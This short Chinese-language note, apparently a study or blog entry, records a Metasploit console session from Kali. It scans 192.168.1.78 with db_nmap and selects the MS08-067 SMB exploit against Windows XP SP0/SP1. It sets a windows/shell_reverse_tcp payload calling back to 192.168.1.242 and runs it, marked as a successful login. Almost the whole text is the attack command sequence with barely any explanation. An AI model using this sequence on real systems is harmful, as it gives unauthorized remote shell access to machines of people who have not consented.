***(適用於 Windows XP SP0、SP1,只看思路)類似 Armitage

root@kali:~# msfconsole

msf > workspace

msf > db_status

msf > workspace -a testlab

msf > db_nmap -T4 -A 192.168.1.78

msf > hosts

msf > services

msf exploit(ms06_040_netapi) > search netapi

 

Matching Modules

================

 

  Name                                Disclosure Date  Rank    Description

  ----                                ---------------  ----    -----------

  exploit/windows/smb/ms03_049_netapi 2003-11-11       good    MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow

  exploit/windows/smb/ms06_040_netapi 2006-08-08       good    MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow

  exploit/windows/smb/ms06_070_wkssvc 2006-11-14       manual  MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow

  exploit/windows/smb/ms08_067_netapi 2008-10-28       great   MS08-067 Microsoft Server Service RelativePath Stack Corruption

 

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > show payloads

msf exploit(ms08_067_netapi) > set payload windows/shell_reverse_tcp

payload => windows/shell_reverse_tcp

msf exploit(ms08_067_netapi) > show options

msf exploit(ms08_067_netapi) > set rhost 192.168.1.78

rhost => 192.168.1.78

msf exploit(ms08_067_netapi) > set lhost 192.168.1.242

lhost => 192.168.1.242

msf exploit(ms08_067_netapi) > show options

msf exploit(ms08_067_netapi) > exploit                              (成功登陸)

 

